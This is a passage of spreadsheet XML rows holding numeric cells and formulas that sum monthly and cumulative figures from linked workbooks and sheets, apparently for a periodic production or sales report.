      <c r="N39" s="195"/>
      <c r="O39" s="200"/>
      <c r="P39" s="236"/>
      <c r="Q39" s="191" t="s">
        <v>279</v>
      </c>
      <c r="R39" s="231">
        <f>'[10]23'!$P$50</f>
        <v>0</v>
      </c>
      <c r="S39" s="232">
        <f>'[10]23'!$Q$50</f>
        <v>1231.546</v>
      </c>
      <c r="T39" s="238">
        <f>'[10]23'!$R$50</f>
        <v>321.24</v>
      </c>
      <c r="U39" s="234">
        <f>T39+'22'!U39</f>
        <v>7315.76</v>
      </c>
      <c r="V39" s="234">
        <f>U39+yc!V39</f>
        <v>86129.359</v>
      </c>
      <c r="W39" s="235">
        <f>'[10]23'!$V$50</f>
        <v>357</v>
      </c>
      <c r="X39" s="234">
        <f>W39+'22'!X39</f>
        <v>7379</v>
      </c>
      <c r="Y39" s="235">
        <f>X39+yc!Y39</f>
        <v>86138</v>
      </c>
      <c r="Z39" s="238">
        <f>'[10]23'!$Y$50</f>
        <v>1168.306</v>
      </c>
    </row>
    <row r="40" ht="15.75" customHeight="1" spans="1:26">
      <c r="A40" s="191"/>
      <c r="B40" s="193" t="s">
        <v>261</v>
      </c>
      <c r="C40" s="193"/>
      <c r="D40" s="193"/>
      <c r="E40" s="194"/>
      <c r="F40" s="194"/>
      <c r="G40" s="225"/>
      <c r="H40" s="194">
        <f>G40+'22'!H40</f>
        <v>0</v>
      </c>
      <c r="I40" s="194">
        <f>H40+yc!I40</f>
        <v>0</v>
      </c>
      <c r="J40" s="194"/>
      <c r="K40" s="194">
        <f>J40+'22'!K40</f>
        <v>0</v>
      </c>
      <c r="L40" s="194">
        <f>K40+yc!L40</f>
        <v>0</v>
      </c>
      <c r="M40" s="194"/>
      <c r="N40" s="195"/>
      <c r="O40" s="200"/>
      <c r="P40" s="219"/>
      <c r="Q40" s="191" t="s">
        <v>280</v>
      </c>
      <c r="R40" s="239">
        <f>'[10]23'!$P$44</f>
        <v>0</v>
      </c>
      <c r="S40" s="240">
        <f>'[10]23'!$Q$44</f>
        <v>0</v>
      </c>
      <c r="T40" s="238">
        <f>'[10]23'!$R$44</f>
        <v>0</v>
      </c>
      <c r="U40" s="234">
        <f>'[10]23'!$S$44</f>
        <v>0</v>
      </c>
      <c r="V40" s="234">
        <f>'[10]23'!$T$44</f>
        <v>0</v>
      </c>
      <c r="W40" s="235">
        <f>'[10]23'!$V$44</f>
        <v>0</v>
      </c>
      <c r="X40" s="234">
        <f>'[10]23'!$W$44</f>
        <v>0</v>
      </c>
      <c r="Y40" s="235">
        <f>'[10]23'!$X$44</f>
        <v>0</v>
      </c>
      <c r="Z40" s="238">
        <f>'[10]23'!$Y$44</f>
        <v>0</v>
      </c>
    </row>
    <row r="41" ht="15.75" customHeight="1" spans="1:26">
      <c r="A41" s="191" t="s">
        <v>252</v>
      </c>
      <c r="B41" s="193" t="s">
        <v>227</v>
      </c>
      <c r="C41" s="193"/>
      <c r="D41" s="193"/>
      <c r="E41" s="194">
        <v>12000</v>
      </c>
      <c r="F41" s="194">
        <f>'[12]23'!$D$16</f>
        <v>26129.76</v>
      </c>
      <c r="G41" s="225">
        <f>'[12]23'!$E$16</f>
        <v>2187</v>
      </c>
      <c r="H41" s="194">
        <f>G41+'22'!H41</f>
        <v>15203</v>
      </c>
      <c r="I41" s="194">
        <f>H41+yc!I41</f>
        <v>140179</v>
      </c>
      <c r="J41" s="194">
        <f>'[12]23'!$I$16</f>
        <v>1010.41</v>
      </c>
      <c r="K41" s="194">
        <f>J41+'22'!K41</f>
        <v>19834.68</v>
      </c>
      <c r="L41" s="194">
        <f>K41+yc!L41</f>
        <v>141228.22</v>
      </c>
      <c r="M41" s="194">
        <f>'[12]23'!$L$16</f>
        <v>21498.08</v>
      </c>
      <c r="N41" s="195">
        <f>M41/30000*100</f>
        <v>71.6602666666667</v>
      </c>
      <c r="O41" s="200"/>
      <c r="P41" s="213" t="s">
        <v>237</v>
      </c>
      <c r="Q41" s="191" t="s">
        <v>277</v>
      </c>
      <c r="R41" s="239">
        <f>'[11]23'!$P$7</f>
        <v>0</v>
      </c>
      <c r="S41" s="240">
        <f>'[11]23'!$Q$7</f>
        <v>0.621</v>
      </c>
      <c r="T41" s="238">
        <f>'[11]23'!$R$7</f>
        <v>0</v>
      </c>
      <c r="U41" s="234">
        <f>T41+'22'!U41</f>
        <v>0</v>
      </c>
      <c r="V41" s="234">
        <f>U41+yc!V41</f>
        <v>0.621000000000095</v>
      </c>
      <c r="W41" s="235">
        <f>'[11]23'!$V$7</f>
        <v>0</v>
      </c>
      <c r="X41" s="234">
        <f>W41+'22'!X41</f>
        <v>0</v>
      </c>
      <c r="Y41" s="235">
        <f>X41+yc!Y41</f>
        <v>9.45910016980633e-14</v>
      </c>
      <c r="Z41" s="238">
        <f>'[11]23'!$Y$7</f>
        <v>0.621</v>
      </c>
    </row>
    <row r="42" ht="15.75" customHeight="1" spans="1:26">
      <c r="A42" s="191"/>
      <c r="B42" s="191" t="s">
        <v>244</v>
      </c>
      <c r="C42" s="193" t="s">
        <v>245</v>
      </c>
      <c r="D42" s="193" t="s">
        <v>246</v>
      </c>
      <c r="E42" s="194">
        <v>0</v>
      </c>
      <c r="F42" s="194">
        <f>'[12]23'!$D$13</f>
        <v>0</v>
      </c>
      <c r="G42" s="225">
        <f>'[12]23'!$E$13</f>
        <v>0</v>
      </c>
      <c r="H42" s="194">
        <f>G42+'22'!H42</f>
        <v>0</v>
      </c>
      <c r="I42" s="194">
        <f>H42+yc!I42</f>
        <v>0</v>
      </c>
      <c r="J42" s="194">
        <f>'[12]23'!$I$13</f>
        <v>0</v>
      </c>
      <c r="K42" s="194">
        <f>J42+'22'!K42</f>
        <v>0</v>
      </c>
      <c r="L42" s="194">
        <f>K42+yc!L42</f>
        <v>0</v>
      </c>
      <c r="M42" s="194">
        <f>'[12]23'!$L$13</f>
        <v>0</v>
      </c>
      <c r="N42" s="207">
        <f>(M42+M43)/50000*100</f>
        <v>0</v>
      </c>
      <c r="O42" s="200"/>
      <c r="P42" s="215"/>
      <c r="Q42" s="193" t="s">
        <v>278</v>
      </c>
      <c r="R42" s="237">
        <f>'[11]23'!$P$8</f>
        <v>14000</v>
      </c>
      <c r="S42" s="238">
        <f>'[11]23'!$Q$8</f>
        <v>8478.836</v>
      </c>
      <c r="T42" s="238">
        <f>'[11]23'!$R$8</f>
        <v>0</v>
      </c>
      <c r="U42" s="234">
        <f>T42+'22'!U42</f>
        <v>9627.68</v>
      </c>
      <c r="V42" s="235">
        <f>U42+yc!V42</f>
        <v>217214.65</v>
      </c>
      <c r="W42" s="235">
        <f>'[11]23'!$V$8</f>
        <v>0</v>
      </c>
      <c r="X42" s="234">
        <f>W42+'22'!X42</f>
        <v>13382</v>
      </c>
      <c r="Y42" s="235">
        <f>X42+yc!Y42</f>
        <v>215853</v>
      </c>
      <c r="Z42" s="238">
        <f>'[11]23'!$Y$8</f>
        <v>4724.516</v>
      </c>
    </row>
    <row r="43" ht="15.75" customHeight="1" spans="1:26">
      <c r="A43" s="191"/>
      <c r="B43" s="193"/>
      <c r="C43" s="193"/>
      <c r="D43" s="206" t="s">
        <v>248</v>
      </c>
      <c r="E43" s="194"/>
      <c r="F43" s="194">
        <f>'[12]23'!$D$14</f>
        <v>0</v>
      </c>
      <c r="G43" s="225">
        <f>'[12]23'!$E$14</f>
        <v>0</v>
      </c>
      <c r="H43" s="194">
        <f>G43+'22'!H43</f>
        <v>0</v>
      </c>
      <c r="I43" s="194">
        <f>H43+yc!I43</f>
        <v>0</v>
      </c>
      <c r="J43" s="194">
        <f>'[12]23'!$I$14</f>
        <v>0</v>
      </c>
      <c r="K43" s="194">
        <f>J43+'22'!K43</f>
        <v>0</v>
      </c>
      <c r="L43" s="194">
        <f>K43+yc!L43</f>
        <v>0</v>
      </c>
      <c r="M43" s="194">
        <f>'[12]23'!$L$14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'[12]23'!$E$44</f>
        <v>0</v>
      </c>
      <c r="H44" s="194">
        <f>G44+'22'!H44</f>
        <v>0</v>
      </c>
      <c r="I44" s="194">
        <f>H44+yc!I44</f>
        <v>128550.22</v>
      </c>
      <c r="J44" s="194">
        <f>'[12]23'!$I$44</f>
        <v>0</v>
      </c>
      <c r="K44" s="194">
        <f>J44+'22'!K44</f>
        <v>0</v>
      </c>
      <c r="L44" s="194">
        <f>K44+yc!L44</f>
        <v>0</v>
      </c>
      <c r="M44" s="194">
        <f>'[12]23'!$L$15</f>
        <v>55872.78</v>
      </c>
      <c r="N44" s="195"/>
      <c r="O44" s="200"/>
      <c r="P44" s="215"/>
      <c r="Q44" s="191" t="s">
        <v>279</v>
      </c>
      <c r="R44" s="237">
        <f>'[11]23'!$P$29</f>
        <v>8000</v>
      </c>
      <c r="S44" s="238">
        <f>'[11]23'!$Q$29</f>
        <v>2299.457</v>
      </c>
      <c r="T44" s="238">
        <f>'[11]23'!$R$29</f>
        <v>353.900000000001</v>
      </c>
      <c r="U44" s="234">
        <f>T44+'22'!U44</f>
        <v>5784.8</v>
      </c>
      <c r="V44" s="235">
        <f>U44+yc!V44</f>
        <v>70537.968</v>
      </c>
      <c r="W44" s="235">
        <f>'[11]23'!$V$29</f>
        <v>168</v>
      </c>
      <c r="X44" s="234">
        <f>W44+'22'!X44</f>
        <v>4099</v>
      </c>
      <c r="Y44" s="235">
        <f>X44+yc!Y44</f>
        <v>70509</v>
      </c>
      <c r="Z44" s="238">
        <f>'[11]23'!$Y$29</f>
        <v>3985.257</v>
      </c>
    </row>
    <row r="45" ht="15.75" customHeight="1" spans="1:26">
      <c r="A45" s="191"/>
      <c r="B45" s="193"/>
      <c r="C45" s="193"/>
      <c r="D45" s="193" t="s">
        <v>251</v>
      </c>
      <c r="E45" s="194"/>
      <c r="F45" s="194"/>
      <c r="G45" s="225">
        <f>'[12]23'!$E$55</f>
        <v>0</v>
      </c>
      <c r="H45" s="194">
        <f>G45+'22'!H45</f>
        <v>0</v>
      </c>
      <c r="I45" s="194">
        <f>H45+yc!I45</f>
        <v>0</v>
      </c>
      <c r="J45" s="225">
        <f>'[12]23'!$I$55</f>
        <v>0</v>
      </c>
      <c r="K45" s="194">
        <f>J45+'22'!K45</f>
        <v>0</v>
      </c>
      <c r="L45" s="194">
        <f>K45+yc!L45</f>
        <v>0</v>
      </c>
      <c r="M45" s="194"/>
      <c r="N45" s="195"/>
      <c r="O45" s="200"/>
      <c r="P45" s="214"/>
      <c r="Q45" s="191" t="s">
        <v>280</v>
      </c>
      <c r="R45" s="237">
        <f>'[11]23'!$P$23</f>
        <v>0</v>
      </c>
      <c r="S45" s="238">
        <f>'[11]23'!$Q$23</f>
        <v>0</v>
      </c>
      <c r="T45" s="238">
        <f>'[11]23'!$R$23</f>
        <v>0</v>
      </c>
      <c r="U45" s="234">
        <f>'[11]23'!$S$23</f>
        <v>0</v>
      </c>
      <c r="V45" s="235">
        <f>'[11]23'!$T$23</f>
        <v>1.329</v>
      </c>
      <c r="W45" s="235">
        <f>'[11]23'!$V$23</f>
        <v>0</v>
      </c>
      <c r="X45" s="234">
        <f>'[11]23'!$W$23</f>
        <v>0</v>
      </c>
      <c r="Y45" s="235">
        <f>'[11]23'!$X$23</f>
        <v>1.329</v>
      </c>
      <c r="Z45" s="238">
        <f>'[11]23'!$Y$23</f>
        <v>0</v>
      </c>
    </row>
    <row r="46" ht="15.75" customHeight="1" spans="1:26">
      <c r="A46" s="191"/>
      <c r="B46" s="193" t="s">
        <v>253</v>
      </c>
      <c r="C46" s="193"/>
      <c r="D46" s="193"/>
      <c r="E46" s="194"/>
      <c r="F46" s="194"/>
      <c r="G46" s="194"/>
      <c r="H46" s="194">
        <f>G46+'22'!H46</f>
        <v>0</v>
      </c>
      <c r="I46" s="194">
        <f>H46+yc!I46</f>
        <v>0</v>
      </c>
      <c r="J46" s="194">
        <f>J47+J50</f>
        <v>0</v>
      </c>
      <c r="K46" s="194">
        <f>J46+'22'!K46</f>
        <v>0</v>
      </c>
      <c r="L46" s="194">
        <f>K46+yc!L46</f>
        <v>0</v>
      </c>
      <c r="M46" s="194"/>
      <c r="N46" s="195"/>
      <c r="O46" s="200"/>
      <c r="P46" s="242" t="s">
        <v>252</v>
      </c>
      <c r="Q46" s="193" t="s">
        <v>277</v>
      </c>
      <c r="R46" s="237">
        <f>'[12]23'!$P$7</f>
        <v>0</v>
      </c>
      <c r="S46" s="238">
        <f>'[12]23'!$Q$7</f>
        <v>0</v>
      </c>
      <c r="T46" s="238">
        <f>'[12]23'!$R$7</f>
        <v>0</v>
      </c>
      <c r="U46" s="234">
        <f>T46+'22'!U46</f>
        <v>0</v>
      </c>
      <c r="V46" s="234">
        <f>U46+yc!V46</f>
        <v>0</v>
      </c>
      <c r="W46" s="235">
        <f>'[12]23'!$V$7</f>
        <v>0</v>
      </c>
      <c r="X46" s="234">
        <f>W46+'22'!X46</f>
        <v>0</v>
      </c>
      <c r="Y46" s="235">
        <f>X46+yc!Y46</f>
        <v>0</v>
      </c>
      <c r="Z46" s="238">
        <f>'[12]23'!$Y$7</f>
        <v>0</v>
      </c>
    </row>
    <row r="47" ht="15.75" customHeight="1" spans="1:26">
      <c r="A47" s="191"/>
      <c r="B47" s="193" t="s">
        <v>254</v>
      </c>
      <c r="C47" s="193"/>
      <c r="D47" s="193"/>
      <c r="E47" s="194">
        <v>12000</v>
      </c>
      <c r="F47" s="194"/>
      <c r="G47" s="225"/>
      <c r="H47" s="194">
        <f>G47+'22'!H47</f>
        <v>0</v>
      </c>
      <c r="I47" s="194">
        <f>H47+yc!I47</f>
        <v>0</v>
      </c>
      <c r="J47" s="194">
        <f>SUM(J48:J49)</f>
        <v>0</v>
      </c>
      <c r="K47" s="194">
        <f>J47+'22'!K47</f>
        <v>0</v>
      </c>
      <c r="L47" s="194">
        <f>K47+yc!L47</f>
        <v>0</v>
      </c>
      <c r="M47" s="194"/>
      <c r="N47" s="195"/>
      <c r="O47" s="200"/>
      <c r="P47" s="243"/>
      <c r="Q47" s="193" t="s">
        <v>278</v>
      </c>
      <c r="R47" s="237">
        <f>'[12]23'!$P$8</f>
        <v>0</v>
      </c>
      <c r="S47" s="238">
        <f>'[12]23'!$Q$8</f>
        <v>0</v>
      </c>
      <c r="T47" s="238">
        <f>'[12]23'!$R$8</f>
        <v>0</v>
      </c>
      <c r="U47" s="234">
        <f>T47+'22'!U47</f>
        <v>0</v>
      </c>
      <c r="V47" s="234">
        <f>U47+yc!V47</f>
        <v>0</v>
      </c>
      <c r="W47" s="235">
        <f>'[12]23'!$V$8</f>
        <v>0</v>
      </c>
      <c r="X47" s="234">
        <f>W47+'22'!X47</f>
        <v>0</v>
      </c>
      <c r="Y47" s="235">
        <f>X47+yc!Y47</f>
        <v>0</v>
      </c>
      <c r="Z47" s="238">
        <f>'[12]23'!$Y$8</f>
        <v>0</v>
      </c>
    </row>
    <row r="48" ht="15.75" customHeight="1" spans="1:26">
      <c r="A48" s="191"/>
      <c r="B48" s="191" t="s">
        <v>231</v>
      </c>
      <c r="C48" s="193" t="s">
        <v>257</v>
      </c>
      <c r="D48" s="193"/>
      <c r="E48" s="194"/>
      <c r="F48" s="194"/>
      <c r="G48" s="225"/>
      <c r="H48" s="194">
        <f>G48+'22'!H48</f>
        <v>0</v>
      </c>
      <c r="I48" s="194">
        <f>H48+yc!I48</f>
        <v>0</v>
      </c>
      <c r="J48" s="194"/>
      <c r="K48" s="194">
        <f>J48+'22'!K48</f>
        <v>0</v>
      </c>
      <c r="L48" s="194">
        <f>K48+yc!L48</f>
        <v>0</v>
      </c>
      <c r="M48" s="194"/>
      <c r="N48" s="195"/>
      <c r="O48" s="200"/>
      <c r="P48" s="243"/>
      <c r="Q48" s="193" t="s">
        <v>279</v>
      </c>
      <c r="R48" s="237">
        <f>'[12]23'!$P$34</f>
        <v>0</v>
      </c>
      <c r="S48" s="238">
        <f>'[12]23'!$Q$34</f>
        <v>1585.503</v>
      </c>
      <c r="T48" s="238">
        <f>'[12]23'!$R$34</f>
        <v>291.97</v>
      </c>
      <c r="U48" s="234">
        <f>T48+'22'!U48</f>
        <v>847.8</v>
      </c>
      <c r="V48" s="234">
        <f>U48+yc!V48</f>
        <v>6874.33</v>
      </c>
      <c r="W48" s="235">
        <f>'[12]23'!$V$8</f>
        <v>0</v>
      </c>
      <c r="X48" s="234">
        <f>W48+'22'!X48</f>
        <v>0</v>
      </c>
      <c r="Y48" s="235">
        <f>X48+yc!Y48</f>
        <v>0</v>
      </c>
      <c r="Z48" s="238">
        <f>'[12]23'!$Y$8</f>
        <v>0</v>
      </c>
    </row>
    <row r="49" ht="15.75" customHeight="1" spans="1:26">
      <c r="A49" s="191"/>
      <c r="B49" s="191"/>
      <c r="C49" s="193" t="s">
        <v>259</v>
      </c>
      <c r="D49" s="193"/>
      <c r="E49" s="194"/>
      <c r="F49" s="194"/>
      <c r="G49" s="194"/>
      <c r="H49" s="194">
        <f>G49+'22'!H49</f>
        <v>0</v>
      </c>
      <c r="I49" s="194">
        <f>H49+yc!I49</f>
        <v>0</v>
      </c>
      <c r="J49" s="194"/>
      <c r="K49" s="194">
        <f>J49+'22'!K49</f>
        <v>0</v>
      </c>
      <c r="L49" s="194">
        <f>K49+yc!L49</f>
        <v>0</v>
      </c>
      <c r="M49" s="194"/>
      <c r="N49" s="195"/>
      <c r="O49" s="200"/>
      <c r="P49" s="197" t="s">
        <v>304</v>
      </c>
      <c r="Q49" s="193" t="s">
        <v>278</v>
      </c>
      <c r="R49" s="237">
        <f>'[13]23'!$P$8</f>
        <v>15340</v>
      </c>
      <c r="S49" s="238">
        <f>'[13]23'!$Q$8</f>
        <v>10593.625</v>
      </c>
      <c r="T49" s="238">
        <f>'[13]23'!$R$8</f>
        <v>0</v>
      </c>
      <c r="U49" s="234">
        <f>T49+'22'!U49</f>
        <v>0</v>
      </c>
      <c r="V49" s="234">
        <f>U49+yc!V49</f>
        <v>179888.95</v>
      </c>
      <c r="W49" s="235">
        <f>'[13]23'!$V$8</f>
        <v>601.3975</v>
      </c>
      <c r="X49" s="234">
        <f>W49+'22'!X49</f>
        <v>2258.9275</v>
      </c>
      <c r="Y49" s="235">
        <f>X49+yc!Y49</f>
        <v>178789.2675</v>
      </c>
      <c r="Z49" s="238">
        <f>'[13]23'!$Y$8</f>
        <v>8334.69750000004</v>
      </c>
    </row>
    <row r="50" ht="15.75" customHeight="1" spans="1:26">
      <c r="A50" s="191"/>
      <c r="B50" s="193" t="s">
        <v>261</v>
      </c>
      <c r="C50" s="193"/>
      <c r="D50" s="193"/>
      <c r="E50" s="194"/>
      <c r="F50" s="194"/>
      <c r="G50" s="225"/>
      <c r="H50" s="194">
        <f>G50+'22'!H50</f>
        <v>0</v>
      </c>
      <c r="I50" s="194">
        <f>H50+yc!I50</f>
        <v>0</v>
      </c>
      <c r="J50" s="194"/>
      <c r="K50" s="194">
        <f>J50+'22'!K50</f>
        <v>0</v>
      </c>
      <c r="L50" s="194">
        <f>K50+yc!L50</f>
        <v>0</v>
      </c>
      <c r="M50" s="194"/>
      <c r="N50" s="195"/>
      <c r="O50" s="200"/>
      <c r="P50" s="200"/>
      <c r="Q50" s="193" t="s">
        <v>277</v>
      </c>
      <c r="R50" s="237">
        <f>'[13]23'!$P$7</f>
        <v>200</v>
      </c>
      <c r="S50" s="238">
        <f>'[13]23'!$Q$7</f>
        <v>0</v>
      </c>
      <c r="T50" s="238">
        <f>'[13]23'!$R$7</f>
        <v>0</v>
      </c>
      <c r="U50" s="234">
        <f>T50+'22'!U50</f>
        <v>0</v>
      </c>
      <c r="V50" s="234">
        <f>U50+yc!V50</f>
        <v>0</v>
      </c>
      <c r="W50" s="235">
        <f>'[13]23'!$V$7</f>
        <v>0</v>
      </c>
      <c r="X50" s="234">
        <f>W50+'22'!X50</f>
        <v>0</v>
      </c>
      <c r="Y50" s="235">
        <f>X50+yc!Y50</f>
        <v>0</v>
      </c>
      <c r="Z50" s="238">
        <f>'[13]23'!$Y$7</f>
        <v>0</v>
      </c>
    </row>
    <row r="51" ht="15.75" customHeight="1" spans="1:26">
      <c r="A51" s="191" t="s">
        <v>304</v>
      </c>
      <c r="B51" s="193" t="s">
        <v>227</v>
      </c>
      <c r="C51" s="193"/>
      <c r="D51" s="193"/>
      <c r="E51" s="194">
        <v>160000</v>
      </c>
      <c r="F51" s="194">
        <f>'[13]23'!$D$24</f>
        <v>48852.6839999998</v>
      </c>
      <c r="G51" s="225">
        <f>'[13]23'!$E$24</f>
        <v>5666</v>
      </c>
      <c r="H51" s="194">
        <f>G51+'22'!H51</f>
        <v>92211.81</v>
      </c>
      <c r="I51" s="194">
        <f>H51+yc!I51</f>
        <v>1468610.81</v>
      </c>
      <c r="J51" s="194">
        <f>'[13]23'!$I$24</f>
        <v>4961.536</v>
      </c>
      <c r="K51" s="194">
        <f>J51+'22'!K51</f>
        <v>112214.735</v>
      </c>
      <c r="L51" s="194">
        <f>K51+yc!L51</f>
        <v>1475338.666</v>
      </c>
      <c r="M51" s="194">
        <f>'[13]23'!$L$24</f>
        <v>28695.9489999998</v>
      </c>
      <c r="N51" s="195">
        <f>M51/45000*100</f>
        <v>63.7687755555551</v>
      </c>
      <c r="O51" s="200"/>
      <c r="P51" s="200"/>
      <c r="Q51" s="193" t="s">
        <v>279</v>
      </c>
      <c r="R51" s="237">
        <f>'[13]23'!$P$30</f>
        <v>8550</v>
      </c>
      <c r="S51" s="238">
        <f>'[13]23'!$Q$30</f>
        <v>3251.37400000001</v>
      </c>
      <c r="T51" s="238">
        <f>'[13]23'!$R$30</f>
        <v>146.45</v>
      </c>
      <c r="U51" s="234">
        <f>T51+'22'!U51</f>
        <v>3768.37</v>
      </c>
      <c r="V51" s="234">
        <f>U51+yc!V51</f>
        <v>66766.841</v>
      </c>
      <c r="W51" s="235">
        <f>'[13]23'!$V$30</f>
        <v>233.8</v>
      </c>
      <c r="X51" s="234">
        <f>W51+'22'!X51</f>
        <v>3892.888</v>
      </c>
      <c r="Y51" s="235">
        <f>X51+yc!Y51</f>
        <v>64509.125</v>
      </c>
      <c r="Z51" s="238">
        <f>'[13]23'!$Y$30</f>
        <v>3126.85600000001</v>
      </c>
    </row>
    <row r="52" ht="15.75" customHeight="1" spans="1:26">
      <c r="A52" s="191"/>
      <c r="B52" s="191" t="s">
        <v>244</v>
      </c>
      <c r="C52" s="193" t="s">
        <v>245</v>
      </c>
      <c r="D52" s="193" t="s">
        <v>246</v>
      </c>
      <c r="E52" s="194">
        <v>175000</v>
      </c>
      <c r="F52" s="194">
        <f>'[13]23'!$D$19</f>
        <v>105046.44300005</v>
      </c>
      <c r="G52" s="225">
        <f>'[13]23'!$E$19</f>
        <v>4748.00000000002</v>
      </c>
      <c r="H52" s="194">
        <f>G52+'22'!H52</f>
        <v>15352.7300000005</v>
      </c>
      <c r="I52" s="194">
        <f>H52+yc!I52</f>
        <v>1398919.98</v>
      </c>
      <c r="J52" s="194">
        <f>'[13]23'!$I$19</f>
        <v>5283.315</v>
      </c>
      <c r="K52" s="194">
        <f>J52+'22'!K52</f>
        <v>86949.48</v>
      </c>
      <c r="L52" s="194">
        <f>K52+yc!L52</f>
        <v>1368643.68</v>
      </c>
      <c r="M52" s="194">
        <f>'[13]23'!$L$19</f>
        <v>33449.6930000507</v>
      </c>
      <c r="N52" s="207">
        <f>(M52+M53)/(65000+80000)*100</f>
        <v>23.0687537931384</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'[13]23'!$D$22</f>
        <v>0</v>
      </c>
      <c r="G53" s="225">
        <f>'[13]23'!$E$22</f>
        <v>0</v>
      </c>
      <c r="H53" s="194">
        <f>G53+'22'!H53</f>
        <v>0</v>
      </c>
      <c r="I53" s="194">
        <f>H53+yc!I53</f>
        <v>0</v>
      </c>
      <c r="J53" s="194">
        <f>'[13]23'!$I$22</f>
        <v>0</v>
      </c>
      <c r="K53" s="194">
        <f>J53+'22'!K53</f>
        <v>0</v>
      </c>
      <c r="L53" s="194">
        <f>K53+yc!L53</f>
        <v>0</v>
      </c>
      <c r="M53" s="194">
        <f>'[13]23'!$L$23</f>
        <v>0</v>
      </c>
      <c r="N53" s="212"/>
      <c r="O53" s="200"/>
      <c r="P53" s="223" t="s">
        <v>262</v>
      </c>
      <c r="Q53" s="193" t="s">
        <v>279</v>
      </c>
      <c r="R53" s="245"/>
      <c r="S53" s="237">
        <f>'[14]23'!$M$21+'[14]23'!$M$22+'[14]23'!$M$35</f>
        <v>1648.947</v>
      </c>
      <c r="T53" s="237">
        <f>'[14]23'!$N$21+'[14]23'!$N$22+'[14]23'!$N$35</f>
        <v>0</v>
      </c>
      <c r="U53" s="234">
        <f>T53+'22'!U53</f>
        <v>967.55</v>
      </c>
      <c r="V53" s="234">
        <f>U53+yc!V53</f>
        <v>39301.977</v>
      </c>
      <c r="W53" s="237">
        <f>'[14]23'!$Q$21+'[14]23'!$Q$22+'[14]23'!$Q$35</f>
        <v>19</v>
      </c>
      <c r="X53" s="234">
        <f>W53+'22'!X53</f>
        <v>758</v>
      </c>
      <c r="Y53" s="235">
        <f>X53+yc!Y53</f>
        <v>40249</v>
      </c>
      <c r="Z53" s="237">
        <f>'[14]23'!$T$21+'[14]23'!$T$22+'[14]23'!$T$35</f>
        <v>1858.497</v>
      </c>
    </row>
    <row r="54" ht="15.75" customHeight="1" spans="1:26">
      <c r="A54" s="191"/>
      <c r="B54" s="193"/>
      <c r="C54" s="193" t="s">
        <v>249</v>
      </c>
      <c r="D54" s="206" t="s">
        <v>250</v>
      </c>
      <c r="E54" s="194"/>
      <c r="F54" s="194"/>
      <c r="G54" s="225">
        <f>'[13]23'!$E$23</f>
        <v>0</v>
      </c>
      <c r="H54" s="194">
        <f>G54+'22'!H54</f>
        <v>0</v>
      </c>
      <c r="I54" s="194">
        <f>H54+yc!I54</f>
        <v>0</v>
      </c>
      <c r="J54" s="194">
        <f>'[13]23'!$I$47</f>
        <v>0</v>
      </c>
      <c r="K54" s="194">
        <f>J54+'22'!K54</f>
        <v>10672.645</v>
      </c>
      <c r="L54" s="194">
        <f>K54+yc!L54</f>
        <v>222114.495</v>
      </c>
      <c r="M54" s="194">
        <f>'[13]23'!$L$22</f>
        <v>0</v>
      </c>
      <c r="N54" s="195"/>
      <c r="O54" s="200"/>
      <c r="P54" s="246" t="s">
        <v>263</v>
      </c>
      <c r="Q54" s="242" t="s">
        <v>279</v>
      </c>
      <c r="R54" s="247">
        <f>'[15]23'!$C$43</f>
        <v>0</v>
      </c>
      <c r="S54" s="247">
        <f>'[15]23'!$D$43</f>
        <v>467.66</v>
      </c>
      <c r="T54" s="247">
        <f>'[15]23'!$E$43</f>
        <v>0</v>
      </c>
      <c r="U54" s="234">
        <f>T54+'22'!U54</f>
        <v>0</v>
      </c>
      <c r="V54" s="248">
        <f>U54+yc!V54</f>
        <v>0</v>
      </c>
      <c r="W54" s="249">
        <f>'[15]23'!$H$43</f>
        <v>0</v>
      </c>
      <c r="X54" s="234">
        <f>W54+'22'!X54</f>
        <v>0</v>
      </c>
      <c r="Y54" s="250">
        <f>X54+yc!Y54</f>
        <v>0</v>
      </c>
      <c r="Z54" s="247">
        <f>'[15]23'!$K$43</f>
        <v>467.66</v>
      </c>
    </row>
    <row r="55" ht="15.75" customHeight="1" spans="1:26">
      <c r="A55" s="191"/>
      <c r="B55" s="193"/>
      <c r="C55" s="193"/>
      <c r="D55" s="193" t="s">
        <v>251</v>
      </c>
      <c r="E55" s="194"/>
      <c r="F55" s="194"/>
      <c r="G55" s="225">
        <f>'[13]23'!$E$63</f>
        <v>0</v>
      </c>
      <c r="H55" s="194">
        <f>G55+'22'!H55</f>
        <v>0</v>
      </c>
      <c r="I55" s="194">
        <f>H55+yc!I55</f>
        <v>0</v>
      </c>
      <c r="J55" s="225">
        <f>'[13]23'!$I$63</f>
        <v>896.315000000001</v>
      </c>
      <c r="K55" s="194">
        <f>J55+'22'!K55</f>
        <v>6831.595</v>
      </c>
      <c r="L55" s="194">
        <f>K55+yc!L55</f>
        <v>42267.245</v>
      </c>
      <c r="M55" s="194"/>
      <c r="N55" s="195"/>
      <c r="O55" s="200"/>
      <c r="P55" s="251" t="s">
        <v>310</v>
      </c>
      <c r="Q55" s="252" t="s">
        <v>279</v>
      </c>
      <c r="R55" s="253">
        <f>'[16]23'!$P$7</f>
        <v>0</v>
      </c>
      <c r="S55" s="253">
        <f>'[16]23'!$Q$7</f>
        <v>0</v>
      </c>
      <c r="T55" s="253">
        <f>'[16]23'!$R$7</f>
        <v>0</v>
      </c>
      <c r="U55" s="254">
        <f>'[16]23'!$S$7</f>
        <v>0</v>
      </c>
      <c r="V55" s="255">
        <f>'[16]23'!$T$7</f>
        <v>0</v>
      </c>
      <c r="W55" s="256">
        <f>'[16]23'!$V$7</f>
        <v>0</v>
      </c>
      <c r="X55" s="254">
        <f>'[16]23'!$W$7</f>
        <v>0</v>
      </c>
      <c r="Y55" s="257">
        <f>'[16]23'!$X$7</f>
        <v>0</v>
      </c>
      <c r="Z55" s="253">
        <f>'[16]23'!$Y$7</f>
        <v>0</v>
      </c>
    </row>
    <row r="56" ht="15.75" customHeight="1" spans="1:26">
      <c r="A56" s="191"/>
      <c r="B56" s="193" t="s">
        <v>253</v>
      </c>
      <c r="C56" s="193"/>
      <c r="D56" s="193"/>
      <c r="E56" s="194"/>
      <c r="F56" s="194"/>
      <c r="G56" s="194"/>
      <c r="H56" s="194">
        <f>G56+'22'!H56</f>
        <v>0</v>
      </c>
      <c r="I56" s="194">
        <f>H56+yc!I56</f>
        <v>0</v>
      </c>
      <c r="J56" s="194">
        <f>J57+J60</f>
        <v>0</v>
      </c>
      <c r="K56" s="194">
        <f>J56+'22'!K56</f>
        <v>0</v>
      </c>
      <c r="L56" s="194">
        <f>K56+yc!L56</f>
        <v>0</v>
      </c>
      <c r="M56" s="194"/>
